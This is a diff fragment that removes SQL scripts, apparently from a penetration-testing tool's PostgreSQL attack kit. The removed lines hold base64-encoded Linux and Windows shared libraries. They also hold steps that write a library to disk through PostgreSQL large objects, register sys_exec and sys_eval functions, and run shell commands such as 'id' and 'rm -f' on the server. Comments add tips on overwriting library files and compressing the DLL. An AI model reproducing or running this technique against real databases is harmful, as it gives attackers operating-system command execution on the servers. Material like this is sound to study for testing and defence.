--- INSERT INTO udftest(data) VALUES ('f0VMRgEBAQAAAAAAAAAAAAMAAwABAAAAYAYAADQAAAB8EQAAAAAAADQAIAAFACgAGQAYAAEAAAAAAAAAAAAAAAAAAAD4CQAA+AkAAAUAAAAAEAAAAQAAAAQPAAAEHwAABB8AAAgBAAAQAQAABgAAAAAQAAACAAAAGA8AABgfAAAYHwAA0AAAANAAAAAGAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAUuV0ZAQPAAAEHwAABB8AAPwAAAD8AAAABAAAAAEAAAARAAAAGgAAAAAAAAANAAAAAAAAAAQAAAAAAAAAAgAAAAcAAAAAAAAAFQAAABcAAAAOAAAADwAAAAwAAAATAAAACAAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAwAAAAUAAAAAAAAAEgAAABgAAAAAAAAACQAAABQAAAALAAAAFgAAAAAAAAAAAAAAAAAAABkAAAAAAAAACgAAAAAAAAAQAAAAAAAAABEAAAADAAAAEAAAAAIAAAAGAAAAiACgAQTNRFkQAAAAFgAAABgAAAAuZ1QeqGi+EqpfvhK645J8QkXV7DNeVB7YcVgcuY3xDurT7w7HDabUAAAAAAAAAAAAAAAAAAAAAJAAAAAAAAAAAAAAABIAAADLAAAAAAAAAAAAAAAQAAAAAQAAAAAAAAAAAAAAIAAAACsAAAAAAAAAAAAAACAAAACWAAAAAAAAAAAAAAASAAAAxAAAAAAAAAAAAAAAEgAAAJ4AAAAAAAAAAAAAABIAAACmAAAAAAAAAAAAAAASAAAAzAAAAAAAAAAAAAAAEgAAAIkAAAAAAAAAAAAAABIAAACCAAAAAAAAAAAAAAASAAAAswAAAAAAAAAAAAAAEgAAABwAAAAAAAAAA');
--- UPDATE udftest SET data=data||'AAAACIAAACsAAAAAAAAAAAAAAASAAAAcQAAAAAAAAAAAAAAEAAAAE0AAAAmBwAACgAAABIACwBWAAAA/ggAAH4AAAASAAsAaAAAADoHAADEAQAAEgALAO4AAAAUIAAAAAAAABAA8f/bAAAADCAAAAAAAAAQAPH/XwAAADAHAAAKAAAAEgALAOIAAAAMIAAAAAAAABAA8f8QAAAA+AUAAAAAAAASAAkAFgAAALgJAAAAAAAAEgAMAD8AAAAcBwAACgAAABIACwAAX19nbW9uX3N0YXJ0X18AX2luaXQAX2ZpbmkAX19jeGFfZmluYWxpemUAX0p2X1JlZ2lzdGVyQ2xhc3NlcwBQZ19tYWdpY19mdW5jAHBnX2ZpbmZvX3N5c19leGVjAHBnX2ZpbmZvX3N5c19ldmFsAHBnX2RldG9hc3RfZGF0dW0AbWFsbG9jAG1lbWNweQBwb3BlbgByZWFsbG9jAHN0cm5jcHkAZmdldHMAcGNsb3NlAF9fc3RhY2tfY2hrX2ZhaWwAc3lzdGVtAHBmcmVlAGxpYmMuc28uNgBfZWRhdGEAX19ic3Nfc3RhcnQAX2VuZABHTElCQ18yLjEuMwBHTElCQ18yLjQAR0xJQkNfMi4wAEdMSUJDXzIuMQAAAAACAAAAAAAAAAMAAwADAAMAAwADAAMABAAFAAIAAAABAAEAAQABAAEAAQABAAEAAQABAAAAAQAEANEAAAAQAAAAAAAAAHMfaQkAAAUA8wAAABAAAAAUaWkNAAAEAP8AAAAQAAAAEGlpDQAAAwAJAQAAEAAAABFpaQ0AAAIAEwEAAAAAAAAgBwAACAAAACoHAAAIAAAANAcAAAgAAAClBwAACAAAAAggAAAIAAAAWwcAAAIPAAAXCQAAAg8AAHIHAAACCwAAlw';
--- UPDATE udftest SET data=data||'cAAAILAACPCAAAAgsAAC4JAAACCwAAhwcAAAIKAADYCAAAAgoAAEMJAAACCgAArQcAAAIBAADyBwAAAgUAABoIAAACBwAAQAgAAAIIAABWCAAAAg4AAO8IAAACDAAATwkAAAIGAABZCQAAAgkAAGkJAAACAgAA6B8AAAYDAADsHwAABgQAAPAfAAAGDQAAACAAAAcDAAAEIAAABw0AAFWJ5VOD7AToAAAAAFuBw/AZAACLk/T///+F0nQF6B4AAADowQAAAOhcAwAAWFvJw/+zBAAAAP+jCAAAAAAAAAD/owwAAABoAAAAAOng/////6MQAAAAaAgAAADp0P///wAAAAAAAAAAVYnlVlPorQAAAIHDihkAAIPsEIC7GAAAAAB1XYuD/P///4XAdA6LgxQAAACJBCTotP///4uLHAAAAI2DHP///42TGP///ynQwfgCjXD/OfFzII22AAAAAI1BAYmDHAAAAP+Ugxj///+LixwAAAA58XLmxoMYAAAAAYPEEFteXcNVieVT6C4AAACBwwsZAACD7ASLkyD///+F0nQVi5P4////hdJ0C42DIP///4kEJP/Sg8QEW13Dixwkw5BVieW44AkAAF3DVYnluNwJAABdw1WJ5bjYCQAAXcNVieVXVlOB7CwEAABloRQAAACJRfAxwItFCItAEIkEJOj8////iceLACX///8/jXD8g+gDiQQk6Pz///+Jw41HBIl0JAiJRCQEiRwk6Pz////GBDMAxwQkAQAAAOj8////iYXY+///x0QkBNQJAACJHCTo/P///4mF3Pv//8eF4Pv//wAAAADrYY298Pv//7gAAAAAuf/////yronI99CNcP+LneD7//8B84lcJASLldj7//+JFCTo/P///4mF2Pv//4l0JAiNhfD7//+';
--- UPDATE udftest SET data=data||'JRCQEi4XY+///A4Xg+///iQQk6Pz///+JneD7//+Lldz7//+JVCQIx0QkBAAEAACNhfD7//+JBCTo/P///4XAD4V3////i5Xc+///iRQk6Pz///+Lhdj7//+AOAB0C4uV4Pv//8ZEEP8Avv////+Lvdj7//+7AAAAAInxidjyrvfRg8EDiQwk6Pz///+JhdT7//+Lvdj7//+J8YnY8q730YPBA4uV1Pv//4kKi73Y+///ifHyrvfRg+kBidCDwASJTCQIi5XY+///iVQkBIkEJOj8////i4XU+///i1XwZTMVFAAAAHQF6Pz///+BxCwEAABbXl9dw1WJ5YPsGIld9Il1+Il9/ItVCItCEIkEJOj8////iceLACX///8/jXD8g+gDiQQk6Pz///+Jw41HBIl0JAiJRCQEiRwk6Pz////GBDMAiRwk6Pz///+JxokcJOj8////i0UIO3gQdAiJPCTo/P///4nwi130i3X4i338iexdw5CQkJBVieVWU+iN/f//gcNqFgAAi4MQ////g/j/dBmNsxD///+NtCYAAAAAg+4E/9CLBoP4/3X0W15dw1WJ5VOD7AToAAAAAFuBwzAWAADokPz//1lbycNyAAAAAQAAAAEAAAAUAAAAIgMAAGQAAAAgAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';
--- UPDATE udftest SET data=data||'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';
--- UPDATE udftest SET data=data||'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP////8AAAAA/////wAAAAAAAAAAAQAAANEAAAAMAAAA+AUAAA0AAAC4CQAABAAAANQAAAD1/v9viAEAAAUAAAB0AwAABgAAANQBAAAKAAAAHQEAAAsAAAAQAAAAAwAAAPQfAAACAAAAEAAAABQAAAARAAAAFwAAAOgFAAARAAAAGAUAABIAAADQAAAAEwAAAAgAAAAWAAAAAAAAAP7//2/IBAAA////bwEAAADw//9vkgQAAPr//28FAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgfAAAAAAAAAAAAAD4GAABOBgAACCAAAA';
--- UPDATE udftest SET data=data||'BHQ0M6IChVYnVudHUgNC4zLjItMXVidW50dTEyKSA0LjMuMgAAR0NDOiAoVWJ1bnR1IDQuMy4yLTF1YnVudHUxMikgNC4zLjIAAEdDQzogKFVidW50dSA0LjMuMi0xdWJ1bnR1MTIpIDQuMy4yAABHQ0M6IChVYnVudHUgNC4zLjItMXVidW50dTEyKSA0LjMuMgAAR0NDOiAoVWJ1bnR1IDQuMy4yLTF1YnVudHUxMikgNC4zLjIAAC5zaHN0cnRhYgAuZ251Lmhhc2gALmR5bnN5bQAuZHluc3RyAC5nbnUudmVyc2lvbgAuZ251LnZlcnNpb25fcgAucmVsLmR5bgAucmVsLnBsdAAuaW5pdAAudGV4dAAuZmluaQAucm9kYXRhAC5laF9mcmFtZQAuY3RvcnMALmR0b3JzAC5qY3IALmR5bmFtaWMALmdvdAAuZ290LnBsdAAuZGF0YQAuYnNzAC5jb21tZW50AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8AAAAFAAAAAgAAANQAAADUAAAAtAAAAAMAAAAAAAAABAAAAAQAAAALAAAA9v//bwIAAACIAQAAiAEAAEwAAAADAAAAAAAAAAQAAAAEAAAAFQAAAAsAAAACAAAA1AEAANQBAACgAQAABAAAAAEAAAAEAAAAEAAAAB0AAAADAAAAAgAAAHQDAAB0AwAAHQEAAAAAAAAAAAAAAQAAAAAAAAAlAAAA////bwIAAACSBAAAkgQAADQAAAADAAAAAAAAAAIAAAACAAAAMgAAAP7//28CAAAAyAQAAMgEAABQAAAABAAAAAEAAAAEAAAAAAAAAEEAAAAJAAAAAgAAABgFAAAYBQAA0AAAAAMAAAAAAAAABAAAAAg';
--- UPDATE udftest SET data=data||'AAABKAAAACQAAAAIAAADoBQAA6AUAABAAAAADAAAACgAAAAQAAAAIAAAAUwAAAAEAAAAGAAAA+AUAAPgFAAAwAAAAAAAAAAAAAAAEAAAAAAAAAE4AAAABAAAABgAAACgGAAAoBgAAMAAAAAAAAAAAAAAABAAAAAQAAABZAAAAAQAAAAYAAABgBgAAYAYAAFgDAAAAAAAAAAAAABAAAAAAAAAAXwAAAAEAAAAGAAAAuAkAALgJAAAcAAAAAAAAAAAAAAAEAAAAAAAAAGUAAAABAAAAAgAAANQJAADUCQAAIAAAAAAAAAAAAAAABAAAAAAAAABtAAAAAQAAAAIAAAD0CQAA9AkAAAQAAAAAAAAAAAAAAAQAAAAAAAAAdwAAAAEAAAADAAAABB8AAAQPAAAIAAAAAAAAAAAAAAAEAAAAAAAAAH4AAAABAAAAAwAAAAwfAAAMDwAACAAAAAAAAAAAAAAABAAAAAAAAACFAAAAAQAAAAMAAAAUHwAAFA8AAAQAAAAAAAAAAAAAAAQAAAAAAAAAigAAAAYAAAADAAAAGB8AABgPAADQAAAABAAAAAAAAAAEAAAACAAAAJMAAAABAAAAAwAAAOgfAADoDwAADAAAAAAAAAAAAAAABAAAAAQAAACYAAAAAQAAAAMAAAD0HwAA9A8AABQAAAAAAAAAAAAAAAQAAAAEAAAAoQAAAAEAAAADAAAACCAAAAgQAAAEAAAAAAAAAAAAAAAEAAAAAAAAAKcAAAAIAAAAAwAAAAwgAAAMEAAACAAAAAAAAAAAAAAABAAAAAAAAACsAAAAAQAAAAAAAAAAAAAADBAAALkAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAMAAAAAAAAAAAAAAMUQAAC1AAAAAAAAAAAAAAABAAAAAAAAAA==';
-
-
--- Create a new OID for a large object, it implicitly adds an entry in the
--- PostgreSQL large objects system table
--- 
--- References:
--- http://www.postgresql.org/docs/8.3/interactive/largeobjects.html
--- http://www.postgresql.org/docs/8.3/interactive/lo-funcs.html
-SELECT lo_unlink(35817);
-SELECT lo_create(35817);
-
-
--- Update the PostgreSQL system large objects table assigning to the just
--- created OID the binary (base64 decoded) UDF as data
--- 
--- Refereces:
--- http://lab.lonerunners.net/blog/sqli-writing-files-to-disk-under-postgresql
-UPDATE pg_largeobject SET data=(DECODE((SELECT data FROM udftest), 'base64')) WHERE loid=35817;
-
-
--- Export the binary UDF OID to a file on the file system
--- 
--- Any folder where postgres user has read/write/execute access is valid
-SELECT lo_export(35817, '/tmp/lib_postgresqludf_sys.so'); -- -rw-r--r-- 1 postgres postgres
--- 
--- Notes:
--- If the library file already exists and the postgres user has write
--- access over it, it can overwrite the file
--- The following enumerates the PostgreSQL data directory
--- SELECT CURRENT_SETTING('data_directory')
--- Reference:
--- http://www.postgresql.org/docs/8.3/interactive/functions-admin.html
--- The following will save into /var/lib/postgresql/M.m/main/lib_postgresqludf_sys.so
--- SELECT lo_export(35817, 'lib_postgresqludf_sys.so'); -- -rw-r--r-- 1 postgres postgres
--- The following would save into / (Permission denied)
--- SELECT lo_export(35817, '/lib_postgresqludf_sys.so');
-
-
--- Create two functions from the binary UDF file
-CREATE OR REPLACE FUNCTION sys_exec(text) RETURNS int4 AS '/tmp/lib_postgresqludf_sys.so', 'sys_exec' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
-CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS '/tmp/lib_postgresqludf_sys.so', 'sys_eval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
-
-
--- Test the two functions
-SELECT sys_exec('echo test > /tmp/lib_postgresqludf_sys.txt'); -- -rw------- 1 postgres postgres
-SELECT sys_eval('cat /tmp/lib_postgresqludf_sys.txt ; id');
-
-
--- Cleanup the file system and the database
-SELECT sys_exec('rm -f /tmp/lib_postgresqludf_sys.*');
-DROP TABLE IF EXISTS udftest;
-DROP FUNCTION IF EXISTS sys_exec(text);
-DROP FUNCTION IF EXISTS sys_eval(text);

extra/postgresqludfsys/command_execution/windows.sql

@@ -1,104 +0,0 @@
--- Notes:
--- 
--- The DLL compiled using PostgreSQL 8.3 C libraries differs from the one
--- compiled using PostgreSQL 8.2 C libraries
--- 
--- DLL compiled using PostgreSQL 8.3 C libraries
--- lib_postgresqludf_sys.dll: 8192 bytes (MS-DOS executable PE  for MS Windows (DLL) (GUI) Intel 80386 32-bit)
--- lib_postgresqludf_sys.dll: 6144 bytes (MS-DOS executable PE  for MS Windows (DLL) (GUI) Intel 80386 32-bit, UPX compressed)
--- 
--- DLL compiled using PostgreSQL 8.2 C libraries
--- lib_postgresqludf_sys.dll: 8192 bytes (MS-DOS executable PE  for MS Windows (DLL) (GUI) Intel 80386 32-bit)
--- lib_postgresqludf_sys.dll: 6144 bytes (MS-DOS executable PE  for MS Windows (DLL) (GUI) Intel 80386 32-bit, UPX compressed)
--- 
--- Little hack to compress the dynamic-linked library:
--- * Read instructions on http://rpbouman.blogspot.com/2007/09/creating-mysql-udfs-with-microsoft.html
---   * Remember to compile it under Visual C++ 2008 with the
---     'Configuration' set as 'Release'
--- * Use upx (http://upx.sourceforge.net) over the DLL:
---   * upx -9 library.dll -o library_upx.dll
-
-
--- Create a table with one field data-type text
-DROP TABLE IF EXISTS udftest;
-CREATE TABLE udftest(data text);
-
-
--- Insert the base64 encoded UDF in the table
-
--- DLL compiled using PostgreSQL 8.3 C libraries
-INSERT INTO udftest(data) VALUES ('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAD12MHTsbmvgLG5r4Cxua+AuME8gLO5r4C4wTqAsLmvgLjBLIC/ua+AuMErgLO5r4CWf9SAtLmvgLG5roCYua+AuMEmgLC5r4C4wT2AsLmvgLjBPoCwua+AUmljaLG5r4AAAAAAAAAAAFBFAABMAQMA+iGDSQAAAAAAAAAA4AACIQsBCQAAEAAAABAAAABgAAAgewAAAHAAAACAAAAAAAAQABAAAAACAAAFAAAAAAAAAAUAAAAAAAAAAJAAAAAQAAAAAAAAAgBAAQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAKyDAAC4AAAAtIIAAPgAAAAAgAAAtAIAAAAAAAAAAAAAAAAAAAAAAABkhAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA7HwAAEgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVVBYMAAAAAAAYAAAABAAAAAAAAAABAAAAAAAAAAAAAAAAAAAgAAA4FVQWDEAAAAAABAAAABwAAAADgAAAAQAAAAAAAAAAAAAAAAAAEAAAOAucnNyYwAAAAAQAAAAgAAAAAYAAAASAAAAAAAAAAAAAAAAAABAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');
-UPDATE udftest SET data=data||'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMy4wMwBVUFghDQkCCcR4kqVtpBAFE1UAABYLAAAAIAAAJgAAnUB2Sf64AAAQ+MPMDxEM/9/+f1NVi2wkDItFEFZXUOgbAeaL2Iszwe4Cg+4Ef/ff/Y1OAVH/FT+MVo1TBIv4UlcgCpBXxgQ3APd/7GMXhFeL8AiUg8QcO10QdAlTQkDO/tvsDQRfi8ZeXVvDbxC6/7Z9gewIBBKhAiAAM8SJhCQEDYtvsvbZBgxAEI2GLXi8fcBudIs3jNVWg8eI2FdTbXfZjmoBiTPVaGIUU4q79tvYM/+MiCBTjVQkOBZTUon/9m3sXCQ8FnyVLIXAdMpEJBSNUAGKG2tv/whAhMl1+SvCLY0sO3YjeETdH/tuUx8gUAP+VxCAi0wkJFFNLO3lsCeL/UsgdbSLXP67sbMQqFMXkPmAPgB0BcZEN/+69gPbz8Zng8AEUKvQxj6Ze+ckGI2kJAAAH40EhRDH/oXtD4kHNlCNTwRWUe+LjLD5gmuZhF0Mi8dfM8zWXTj8KfKBxFFi/yWBqAX92z88pDsNYHUC88PpCAWvi/9WaIAXYmXMXORw7a5ZWd3/f5ejI1gEVIX2dQUzwEBew4MmAFYHtit83X1oBKcJZnKpBrkLe6O1NlkjIk407FFRCv8Ku385RQx1DjkFaxB+ZXMQg30Mu4XG3QGLCRBIiw3MiQojSC3stu4PhdR9ZBcYBot5wjW7dnfbICiJPVC7HlDrGEqnBHJw';
-UPDATE udftest SET data=data||'4cH+O8d0F2joA6gsagDp/9bwrtveaOfrB8csATyhL0xqAl797d7dyQlqH5IJJus8qhDABLjHBbOufe8fKBog4CcHXOP9+75vILQEsBsaWYk1KzR3f+52WTmydQhpczA5PRVcdBxW+tu9aAYoCFxDDf91IAPDF9veCCMW//FUbAHsjzU33AgBodt4BINl/ADfJBPZ2dsP1PxvbLD2g/gCZtJZW/+gvBm2sVhLUDFZLjUPhIfXHO07xxlUE00UGNjGt38QiX0Ig+8EO8hyUYM/f/NqmG3tt5wHdOn/NyYg+BBmbbbQXLn4VhVE1rjj9htHTfhVOU0QA9C7bVv7CHS0iQkCDBoIYOun9ogxO2kM5FlELoXtK8Q4WAZMMvw//g1HkFBDm1vJwgwAahBzf3sbQxIo0MT5i/KLXQgcVOFld3vkM8lc/Il9IAj8O/FaP7YWYzk6RBfkr2g728Kb//B0BYP+AnUuoew7wXSeVl/QzizccDte5AADkxFO9uB2WgJQFBaAEgkyzloN/yf+AXUkZCBOE1fXEJsVdy9S0gYRDftrtFP3agN1Q09hhz3bNAMhaHQuLCV/8bZw4esbceyLFwmq4FBRtMKl8mQsEGXo9i/brm04+tL+/wAZBYEq5KSuPX4hncOW7Bb/O3B8hdMkahvWVDO8u1V9RFUMDQR2WV04ItpQLhAnKANfISBzc/NmQwUciRUYiR0UiTU023dzEIk9DGaMGDgGDSyzNEuzHQgFBCWsfXdLAC1//JyPFDCVVvbPn20kBwQojUUINIuF4Pygrp2NsapwlQEcGWNs69ggJBMYCWXACRyzls/dNWCJhdgyCgTcKvCNYQMUNGidBqcz/rRsWWr3GHkt77D2fRyDPSAA+SNoW9NjBWIbegYkycOAkY8L30Aecl9qFEpQ9FhISRWq+KLG4fefnBBkWetnagg3hFmP7dYdkhsnNVk04PXzHW6FvwPkUH9LdIytbT9gCn4c3BQs1uK0VypbCeAb0jpnk+Ul2wdd3Gx4/u/c';
-UPDATE udftest SET data=data||'hFnZThYGwffYG8D32FlIXX/p221WuLwYvgRXUDvGcw+LB/QOGh1TAlDNO/5y8SnkOawwJSAg7RsxEz9lMQi4TVoql39X+mY5AXQEVGRBPAPBgThQRXXviRv8+zPSuQsBHEgYD5Tfwl1+35qGLT/ZSDHID7dBDbbbEjhWBXEGM1f4b43G0ggYDXbgnBwMO/nab/D/cgmLWAgD2Tv7cgpCvCg71nLoag+H7JnbTk9q/p9w8wUcm2i1ZA7+UIPsCN1wawwlMWIzxWzwZKMLn6H0GoksSAloS/CuMzEGbMwS61WXNMvDvi0TUBkIDAg7QbjwWxskwegf9wvgAYW77dQKA08ZAFmUi+Xr2E5qlpkByj2lwPqyFuwUmS+7MSNjJ7EzPAVARPlxSSNMpRKsEOw7uQ5jCWEQxab7CwOPWe9W+TbLNttSkGwDjSvg+lgDzZn88Tyq/Ipgk2Agcw3DlQ4O42yWUUoUdT50uxnaaQH2BCAUCopW7PdYGFij7BBofjQH/8j4U1e/TuZAu3pmU6HEHXgNhcMnNZBiUmvxBOtg+3hfC8VaW4F1mJILh/DmyiBjBzQInSf9re1oGPQzDBE793UHvk8IfBffWesLhfN1o8HgEAvwxCOUPvYA99YHBF5fW7Y/mCMjI2MFnFhcYAKyIyNoVAAAlAp5AAIFALPsPmqpwRQRIwNkaAZpugNAAXJI/36JMn1REhBLUlNEU/9///9ie5Q0/rQnQb7gu040vsrDF0M6XERvY3VtZW50/9v//3MgYW5kIFNldHRpbmdzXEFkbQdpc3RyYXRvci63t/b/VzJLM1NURU5VUERBBjNlc2sWcFzt/9/+c2hhcmVcdiZ1YWxfY3BwX3Byb2plY3Q+2/+2/GxpYl9wb2cfc3FsdWRmX3N5FVLDfoH9ZWxlYXNlHS5wZGLRfC8WyLUZlwfQYF0lmw/HhQdOyWHdUQNlJ8wHYXQn7MAP2B8I6wP/IAABSfBBqSDKIiIBZt8NsRm/RP8Ag1EGjKpgApIYBVBU';
-UPDATE udftest SET data=data||'gC0oFP8vzxR4EAFHZXRDdXJyZW50//+R/1Byb2Nlc3NJZFN5c3RlbVRpbWVBc0ZpbGWt/RZ7CRgIY2tDb3UvDYu1v/1RdWVyeVADZm9ybWFuPBYO/Vv3WxhEaXNhYjNoV2FkTGlicmFW/m+/J0NhbGxzb0lzRGVidWdnZXJt2/ayuXZUU1VuaEBkMWRhMffbRXhGcHRpb25zShmgbSlbuRJUF99kbQlEYR4RSZBsc9utbQxrQJ1tcIdlR1GEteaaf3dVUSLCbNmyG1zEFXd7moUzhTxfY2l0NG3fDVhtCl80X2Ftc2cIeO9+4a8RC2RqdUJfZmRpdg1fQ3BwQPvD2lhjv7xfZGVjbwNtYcISlGkyXW0e1t4ruHkYQosy9QlMFizYbk0TD2Xt9gkjDV8bcjRfTG1tHGbX/n0YbldkX251PURtYdzCxrZjHnI0bnPY3Qzb9h0IZvJ0LK5ybrnbO4yEc/zdKnBlVeYK7ZtFD2MHtDA6twnOve9WyM6Lb29D+9ZitiJWbl90eTkctlBoDRqJFYpfcnuahS0KbEaRpHBFuODePXBnQ3RvYXNLunVt///PAlYQMBgJHxYjKgsXJBEXEQeCBgb2////FwkHBRYMHggKCxYJGBgVBQYbBQwQBgcXBiEFEQ++/2//BhQhEQsIKyIFBw0RHQ0YUy1IOAYAB9u+XU4IDAkzCgkLDFsFFr/922UWDgs0FQsYFg09BUK4BRIeFGub/90GaTIRDA4dTQUXIw0MJAgkAFPB/x/wJgY0BGAE6AgEHBwEAFL5D6t/TAEFAPohg0k04AACIQsBCcDsN2kMWwCQFQsz971HGgkLAt4e36X5ZgcDYATbzx5Ae7bsvQEqAgcGcCYHs33LZriMIlAUQE+wNdubMgBQn3fQHGWxA1nVGCFCAJsfSLovsC50ZXh0mgoestlgkAy3QmAucgmD3BrLYfsoBwgTfa85bAJALib+A23KTtOUMAInwE/7XrDGc3KA67BzGk9ujkYAUqlPjAFvSgZpUB5C';
-UPDATE udftest SET data=data||'GwDgk9uMIxKhUlMAAAAAAAAAAACQ/wAAAAAAAAAAAACAfCQIAQ+FuQEAAGC+AHAAEI2+AKD//1eDzf/rDZCQkIoGRogHRwHbdQeLHoPu/BHbcu24AQAAAAHbdQeLHoPu/BHbEcAB23PvdQmLHoPu/BHbc+QxyYPoA3INweAIigZGg/D/dHSJxQHbdQeLHoPu/BHbEckB23UHix6D7vwR2xHJdSBBAdt1B4seg+78EdsRyQHbc+91CYseg+78Edtz5IPBAoH9APP//4PRAY0UL4P9/HYPigJCiAdHSXX36WP///+QiwKDwgSJB4PHBIPpBHfxAc/pTP///16J97ktAAAAigdHLOg8AXf3gD8AdfKLB4pfBGbB6AjBwBCGxCn4gOvoAfCJB4PHBYjY4tmNvgBQAACLBwnAdDyLXwSNhDC0cgAAAfNQg8cI/5YEcwAAlYoHRwjAdNyJ+VdI8q5V/5YIcwAACcB0B4kDg8ME6+FhMcDCDACDxwSNXvwxwIoHRwnAdCI873cRAcOLA4bEwcAQhsQB8IkD6+IkD8HgEGaLB4PHAuvii64McwAAjb4A8P//uwAQAABQVGoEU1f/1Y2HBwIAAIAgf4BgKH9YUFRQU1f/1VhhjUQkgGoAOcR1+oPsgOmnmP//AAAASAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAEBAiABABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';
